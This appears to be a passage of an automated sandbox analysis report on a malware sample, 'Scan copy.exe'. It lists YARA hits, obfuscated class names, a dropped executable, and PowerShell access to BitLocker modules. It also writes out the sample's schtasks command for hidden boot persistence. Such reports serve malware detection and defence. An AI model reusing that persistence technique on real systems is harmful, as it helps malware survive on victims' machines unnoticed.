                Source: Yara matchFile source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Scan copy.exe PID: 5420, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vLQwEscoQr.exe PID: 7512, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vLQwEscoQr.exe PID: 8048, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8866F push ecx; iretd 0_2_06C88672
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C88673 push eax; iretd 0_2_06C8867A
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8B631 pushfd ; iretd 0_2_06C8B63D
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8A79D pushad ; iretd 0_2_06C8A76A
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8A760 pushad ; iretd 0_2_06C8A762
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8A763 pushad ; iretd 0_2_06C8A76A
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8F773 pushfd ; iretd 0_2_06C8F776
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8F733 pushfd ; iretd 0_2_06C8F772
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C894B0 push esi; iretd 0_2_06C894BA
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C88411 push eax; iretd 0_2_06C88412
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8B2CB pushad ; iretd 0_2_06C8B2CD
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C892D1 push esi; iretd 0_2_06C892D2
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C892D3 push esi; iretd 0_2_06C892DA
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8B280 pushfd ; iretw 0_2_06C8B281
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C89279 push esi; iretd 0_2_06C8927A
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C89229 push esi; iretd 0_2_06C8922A
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8B238 push esp; iretw 0_2_06C8B239
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C893E1 push esi; iretd 0_2_06C893E2
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C890FC push ebp; iretd 0_2_06C89102
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8B020 pushfd ; iretd 0_2_06C8B021
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8B023 push esp; iretd 0_2_06C8B029
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C85180 push esp; iretd 0_2_06C85181
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C88EE0 push esp; iretd 0_2_06C88EE2
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8BE83 push es; iretd 0_2_06C8BE8C
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C82EAB push ss; iretd 0_2_06C82EB2
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C82E78 push ss; iretd 0_2_06C82E7A
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C82E7B push ss; iretd 0_2_06C82E82
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C88FD5 push ebp; iretd 0_2_06C88FD6
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8AF9B push esp; iretd 0_2_06C8AFA5
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C8AC53 pushad ; iretd 0_2_06C8AC5A
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_06C85DB0 pushfd ; iretd 0_2_06C85DB1
                Source: Scan copy.exeStatic PE information: section name: .text entropy: 7.783011599815193
                Source: vLQwEscoQr.exe.0.drStatic PE information: section name: .text entropy: 7.783011599815193
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, GRPYfmOB3y0jip2cyW.csHigh entropy of concatenated method names: 'fyQk5Xndub', 'LbNk4oky8i', 'JLKk7Zrp0J', 'XnRkLXBEmt', 'Kw6kMkKqxL', 'cOgkCWa4BA', 'ILMkU0YwDT', 'FNVkKluVJj', 'YRZlqoT9kvQ2B5XRP6N', 'Aee5m1TBxTt6uIDHlsp'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, uFXK8DKWONX2irnLwF.csHigh entropy of concatenated method names: 'rNGWGF6uXP', 'zrwWCNeqA9', 'wagEjFNNLv', 'QAhEOd9jp0', 'eOnExH6Hh8', 'Y1AEgTQbME', 'yXwEX0pbKv', 'WhyE9g1Rps', 'siVEnvTJad', 'KxVEsOn1P5'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, Lcxc7GHkibRcYMJMOV.csHigh entropy of concatenated method names: 'sPCY8h3eTB', 'cYCYlrXmN2', 'mjVYv4vH60', 'r5ZYmquFXK', 'pnLYtwFgTV', 'rRmYqmHL73', 'gETfMgtFRMXcGhBtef', 'SIGSA26wYXfbG4WTg0', 'er4YY7L3CE', 'C0XYhOM6xR'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, IJshKay7CF0iOgidJ3.csHigh entropy of concatenated method names: 'Tek6EIJIJV', 'fi56WUmeKx', 'tnR6keZohl', 'UGD68AaWuA', 'PkS6VhDWwq', 'F9t6lESYiv', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, alKptdejBDeEOpP6Dm.csHigh entropy of concatenated method names: 'FfHrvv6Pl4', 'ujbrmfWkKh', 'ToString', 'jjnrfy1E9Q', 'gxur0Zo2w8', 'w2grEehfeI', 'm7yrWC6vXf', 'kXIrk720xY', 'JMLr8SNSjg', 'vYbrlnB8hl'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, ChwRleZEVkmEtJMsRE.csHigh entropy of concatenated method names: 'EGCVSLlQAc', 'hySVIDt2xR', 'VrdVjtuwcM', 'UgaVONrc1D', 'yujVxd0HNr', 'fwaVgDQjFr', 'tTkVXys0AU', 'nIXV970pE4', 'GMZVn5kYG2', 'xBPVsmm03N'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, tdSmWvUjV4vH60w5Zq.csHigh entropy of concatenated method names: 'aHaELiP1LL', 'WuSEMmxIqn', 'A4HEblxf1i', 'VlDEUI6hKm', 'Jy6Ettpsqd', 'QotEq1mnRu', 'X3iErRCTKa', 'lANEw5EoTY', 'kUPEVC0OaW', 'lsfE6fsKH5'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, bfr1t8E2DJXBZtdeYP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'OwmNZMtqHa', 'XboNyv3I6H', 'tamNzmPED0', 'mvXh1jTr4y', 'z1bhY2VkiY', 'QSIhNa1b28', 'C25hhTd04U', 'oIsGF5Ilg56b53rKnk0'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, FuOuOrYHqXEoXFL81Gv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TJ8uVoan1T', 'F9vu6gC8bo', 'Fgfuc9hyc9', 'vseuu277Kd', 'CFAuBc1ghG', 'xR0u39MIAR', 'ETHu5awGHk'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, SD7ablal7P4l4hOWbA.csHigh entropy of concatenated method names: 'yxHrQujFhw', 'QKury8gAhA', 'xs2w1v9P4T', 'qMEwYmrVcW', 'QQIrAu1mCA', 'cvrrPj1FDd', 'oPIropq3pf', 'XQ5rDJQ60k', 'dpXr2dDjtJ', 's4NrdxwJbq'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, W1UFvWNspZ6HiF5PCR.csHigh entropy of concatenated method names: 'SqK7WhmHK', 'a9PLyPkc3', 'DinMwSehT', 'fsfC48oR4', 'm3iUa2eWf', 'KfdKiEt1W', 'aJ7bLqws7msfcFCpAo', 'l0qIGnNP1H7RooN6Mq', 'JHTwyXthI', 'uEH62jGry'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, WLmKhYDRClOGs5RM8j.csHigh entropy of concatenated method names: 'd49tsFfH2n', 'bHhtPmA2Ka', 'FBotDZpOJs', 'Edmt2707Lv', 'snMtI5jmRc', 'e2OtjQfQYp', 'zxitO9klFX', 'fMbtxCWlIR', 'zuftg8Iv2s', 'rZQtXD84G6'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, AgyBZslxuiICoVYBCt.csHigh entropy of concatenated method names: 'St8hp7F7lM', 'VcShfNkTtO', 'SkXh0tLPVb', 'In8hEArWDx', 'I3ahW6rNlL', 'PTahkfjO9D', 'CkCh8BX733', 'UsvhlxhvrN', 'f68hiP7AgD', 'fCHhv5X7Ks'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, H1s3JrYYfDfmD9ntJgv.csHigh entropy of concatenated method names: 'FdO6yABV2W', 'o4n6zuBMEy', 'VFAc1TgomU', 'qKOcYoEvM8', 'UbLcNQmF6N', 'x0MchNG02A', 'eTecHR5fVp', 'PuLcp70wWb', 'ki1cfqrKVJ', 'aREc0fPeCQ'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, Ch3eTBbNYCrXmN2i0X.csHigh entropy of concatenated method names: 'pVK0DivKbP', 'rbx02IXXX1', 'gib0dRdQtb', 'xFv0enLgT7', 'sh30Fxus7q', 'sKn0alMqPW', 'QiW0TeHwjg', 'DGQ0QxCoEk', 'neV0ZGeoWe', 'P0w0ymuYNf'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, KTVwRmSmHL73fGetZE.csHigh entropy of concatenated method names: 'n4nkpxQvLJ', 'gwhk0efhPx', 'XvQkWoB5EQ', 'AN0k8CH9sR', 'IZaklCDwqk', 'K6rWFF8flq', 'TsiWadAQEQ', 'uqgWTcwwsT', 'mxRWQknBb9', 'IiSWZklhvx'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, NXYGX6nBjRv1cwPefo.csHigh entropy of concatenated method names: 'T1P84XTcwI', 'oJm8JBFGjb', 'OC9870PLMM', 'shC8L9rXBu', 'ND48GZTkqq', 'RkI8M72HM2', 'CJJ8C9Nbvg', 'u1d8bdwCXq', 'zJ48UMXHqv', 'Dm08KuOplw'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, bO8qZBdcbY6NmnIdri.csHigh entropy of concatenated method names: 'ToString', 'fMtqAXApHu', 'lp3qIwCQRH', 'l8JqjB3xHX', 'WZrqOWnT8H', 'ITtqx28rBt', 'I7Nqgx5Ld9', 'tXrqX3sr15', 'BQyq9eRZvo', 'crIqnxsvLJ'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, RhEq28zeTKQX83oE1S.csHigh entropy of concatenated method names: 'pxF6MH2upc', 'BhT6bhyYev', 'Dmq6U6d1fj', 'P5U6SsHAcF', 'ePF6I7N2iE', 'UvF6Om109e', 'rio6xHd1R7', 'aXw65Hqlc0', 'F2k64qU4Mp', 'VGV6JjhK02'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, pAnAPjTQUM53AE5qZc.csHigh entropy of concatenated method names: 'AYnVtotQC7', 'mbvVrZNaK7', 'fj3VVPxgXF', 'exvVcCFWrm', 'zOZVBw6RSo', 'mKRV5qmKjt', 'Dispose', 'lUbwfIRSMY', 'uOUw0kRPvk', 'DZLwEE9VKv'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, R5jlAConUcCAuc98mi.csHigh entropy of concatenated method names: 'u26RbNyghA', 'LtKRUax1ei', 'XLSRSpjUsH', 'tjJRIxIWHA', 'uWkRObYWNL', 'zlERxnJxpD', 'tqYRXZZoBJ', 'IA6R9ew63b', 'cxlRsJqpUS', 'varRAYUwmy'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, p0Y1AI0FRZi7o7UMfy.csHigh entropy of concatenated method names: 'Dispose', 'B53YZAE5qZ', 'U8HNIlEOab', 'yYeYQaX5JL', 'txUYyKBYhv', 'sGRYziYrJS', 'ProcessDialogKey', 'GJCN1hwRle', 'hVkNYmEtJM', 'ORENNOJshK'
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, q3gxyfIJhYjGiWM9ZP.csHigh entropy of concatenated method names: 'g90FQ5TvF3RhhJJ1SfA', 'EaA9iRTMocKqEWfcoZ1', 'f33kwqlPom', 'PJSkVZCUsQ', 'fCak6lYwy8', 'BpBHQFT7JTgtmuE2LFa', 'NXvqumTHuDolMOii0ke'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, GRPYfmOB3y0jip2cyW.csHigh entropy of concatenated method names: 'fyQk5Xndub', 'LbNk4oky8i', 'JLKk7Zrp0J', 'XnRkLXBEmt', 'Kw6kMkKqxL', 'cOgkCWa4BA', 'ILMkU0YwDT', 'FNVkKluVJj', 'YRZlqoT9kvQ2B5XRP6N', 'Aee5m1TBxTt6uIDHlsp'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, uFXK8DKWONX2irnLwF.csHigh entropy of concatenated method names: 'rNGWGF6uXP', 'zrwWCNeqA9', 'wagEjFNNLv', 'QAhEOd9jp0', 'eOnExH6Hh8', 'Y1AEgTQbME', 'yXwEX0pbKv', 'WhyE9g1Rps', 'siVEnvTJad', 'KxVEsOn1P5'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, Lcxc7GHkibRcYMJMOV.csHigh entropy of concatenated method names: 'sPCY8h3eTB', 'cYCYlrXmN2', 'mjVYv4vH60', 'r5ZYmquFXK', 'pnLYtwFgTV', 'rRmYqmHL73', 'gETfMgtFRMXcGhBtef', 'SIGSA26wYXfbG4WTg0', 'er4YY7L3CE', 'C0XYhOM6xR'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, IJshKay7CF0iOgidJ3.csHigh entropy of concatenated method names: 'Tek6EIJIJV', 'fi56WUmeKx', 'tnR6keZohl', 'UGD68AaWuA', 'PkS6VhDWwq', 'F9t6lESYiv', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, alKptdejBDeEOpP6Dm.csHigh entropy of concatenated method names: 'FfHrvv6Pl4', 'ujbrmfWkKh', 'ToString', 'jjnrfy1E9Q', 'gxur0Zo2w8', 'w2grEehfeI', 'm7yrWC6vXf', 'kXIrk720xY', 'JMLr8SNSjg', 'vYbrlnB8hl'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, ChwRleZEVkmEtJMsRE.csHigh entropy of concatenated method names: 'EGCVSLlQAc', 'hySVIDt2xR', 'VrdVjtuwcM', 'UgaVONrc1D', 'yujVxd0HNr', 'fwaVgDQjFr', 'tTkVXys0AU', 'nIXV970pE4', 'GMZVn5kYG2', 'xBPVsmm03N'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, tdSmWvUjV4vH60w5Zq.csHigh entropy of concatenated method names: 'aHaELiP1LL', 'WuSEMmxIqn', 'A4HEblxf1i', 'VlDEUI6hKm', 'Jy6Ettpsqd', 'QotEq1mnRu', 'X3iErRCTKa', 'lANEw5EoTY', 'kUPEVC0OaW', 'lsfE6fsKH5'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, bfr1t8E2DJXBZtdeYP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'OwmNZMtqHa', 'XboNyv3I6H', 'tamNzmPED0', 'mvXh1jTr4y', 'z1bhY2VkiY', 'QSIhNa1b28', 'C25hhTd04U', 'oIsGF5Ilg56b53rKnk0'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, FuOuOrYHqXEoXFL81Gv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TJ8uVoan1T', 'F9vu6gC8bo', 'Fgfuc9hyc9', 'vseuu277Kd', 'CFAuBc1ghG', 'xR0u39MIAR', 'ETHu5awGHk'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, SD7ablal7P4l4hOWbA.csHigh entropy of concatenated method names: 'yxHrQujFhw', 'QKury8gAhA', 'xs2w1v9P4T', 'qMEwYmrVcW', 'QQIrAu1mCA', 'cvrrPj1FDd', 'oPIropq3pf', 'XQ5rDJQ60k', 'dpXr2dDjtJ', 's4NrdxwJbq'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, W1UFvWNspZ6HiF5PCR.csHigh entropy of concatenated method names: 'SqK7WhmHK', 'a9PLyPkc3', 'DinMwSehT', 'fsfC48oR4', 'm3iUa2eWf', 'KfdKiEt1W', 'aJ7bLqws7msfcFCpAo', 'l0qIGnNP1H7RooN6Mq', 'JHTwyXthI', 'uEH62jGry'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, WLmKhYDRClOGs5RM8j.csHigh entropy of concatenated method names: 'd49tsFfH2n', 'bHhtPmA2Ka', 'FBotDZpOJs', 'Edmt2707Lv', 'snMtI5jmRc', 'e2OtjQfQYp', 'zxitO9klFX', 'fMbtxCWlIR', 'zuftg8Iv2s', 'rZQtXD84G6'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, AgyBZslxuiICoVYBCt.csHigh entropy of concatenated method names: 'St8hp7F7lM', 'VcShfNkTtO', 'SkXh0tLPVb', 'In8hEArWDx', 'I3ahW6rNlL', 'PTahkfjO9D', 'CkCh8BX733', 'UsvhlxhvrN', 'f68hiP7AgD', 'fCHhv5X7Ks'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, H1s3JrYYfDfmD9ntJgv.csHigh entropy of concatenated method names: 'FdO6yABV2W', 'o4n6zuBMEy', 'VFAc1TgomU', 'qKOcYoEvM8', 'UbLcNQmF6N', 'x0MchNG02A', 'eTecHR5fVp', 'PuLcp70wWb', 'ki1cfqrKVJ', 'aREc0fPeCQ'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, Ch3eTBbNYCrXmN2i0X.csHigh entropy of concatenated method names: 'pVK0DivKbP', 'rbx02IXXX1', 'gib0dRdQtb', 'xFv0enLgT7', 'sh30Fxus7q', 'sKn0alMqPW', 'QiW0TeHwjg', 'DGQ0QxCoEk', 'neV0ZGeoWe', 'P0w0ymuYNf'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, KTVwRmSmHL73fGetZE.csHigh entropy of concatenated method names: 'n4nkpxQvLJ', 'gwhk0efhPx', 'XvQkWoB5EQ', 'AN0k8CH9sR', 'IZaklCDwqk', 'K6rWFF8flq', 'TsiWadAQEQ', 'uqgWTcwwsT', 'mxRWQknBb9', 'IiSWZklhvx'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, NXYGX6nBjRv1cwPefo.csHigh entropy of concatenated method names: 'T1P84XTcwI', 'oJm8JBFGjb', 'OC9870PLMM', 'shC8L9rXBu', 'ND48GZTkqq', 'RkI8M72HM2', 'CJJ8C9Nbvg', 'u1d8bdwCXq', 'zJ48UMXHqv', 'Dm08KuOplw'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, bO8qZBdcbY6NmnIdri.csHigh entropy of concatenated method names: 'ToString', 'fMtqAXApHu', 'lp3qIwCQRH', 'l8JqjB3xHX', 'WZrqOWnT8H', 'ITtqx28rBt', 'I7Nqgx5Ld9', 'tXrqX3sr15', 'BQyq9eRZvo', 'crIqnxsvLJ'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, RhEq28zeTKQX83oE1S.csHigh entropy of concatenated method names: 'pxF6MH2upc', 'BhT6bhyYev', 'Dmq6U6d1fj', 'P5U6SsHAcF', 'ePF6I7N2iE', 'UvF6Om109e', 'rio6xHd1R7', 'aXw65Hqlc0', 'F2k64qU4Mp', 'VGV6JjhK02'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, pAnAPjTQUM53AE5qZc.csHigh entropy of concatenated method names: 'AYnVtotQC7', 'mbvVrZNaK7', 'fj3VVPxgXF', 'exvVcCFWrm', 'zOZVBw6RSo', 'mKRV5qmKjt', 'Dispose', 'lUbwfIRSMY', 'uOUw0kRPvk', 'DZLwEE9VKv'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, R5jlAConUcCAuc98mi.csHigh entropy of concatenated method names: 'u26RbNyghA', 'LtKRUax1ei', 'XLSRSpjUsH', 'tjJRIxIWHA', 'uWkRObYWNL', 'zlERxnJxpD', 'tqYRXZZoBJ', 'IA6R9ew63b', 'cxlRsJqpUS', 'varRAYUwmy'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, p0Y1AI0FRZi7o7UMfy.csHigh entropy of concatenated method names: 'Dispose', 'B53YZAE5qZ', 'U8HNIlEOab', 'yYeYQaX5JL', 'txUYyKBYhv', 'sGRYziYrJS', 'ProcessDialogKey', 'GJCN1hwRle', 'hVkNYmEtJM', 'ORENNOJshK'
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, q3gxyfIJhYjGiWM9ZP.csHigh entropy of concatenated method names: 'g90FQ5TvF3RhhJJ1SfA', 'EaA9iRTMocKqEWfcoZ1', 'f33kwqlPom', 'PJSkVZCUsQ', 'fCak6lYwy8', 'BpBHQFT7JTgtmuE2LFa', 'NXvqumTHuDolMOii0ke'
                Source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                Source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                Source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                Source: C:\Users\user\Desktop\Scan copy.exeFile created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
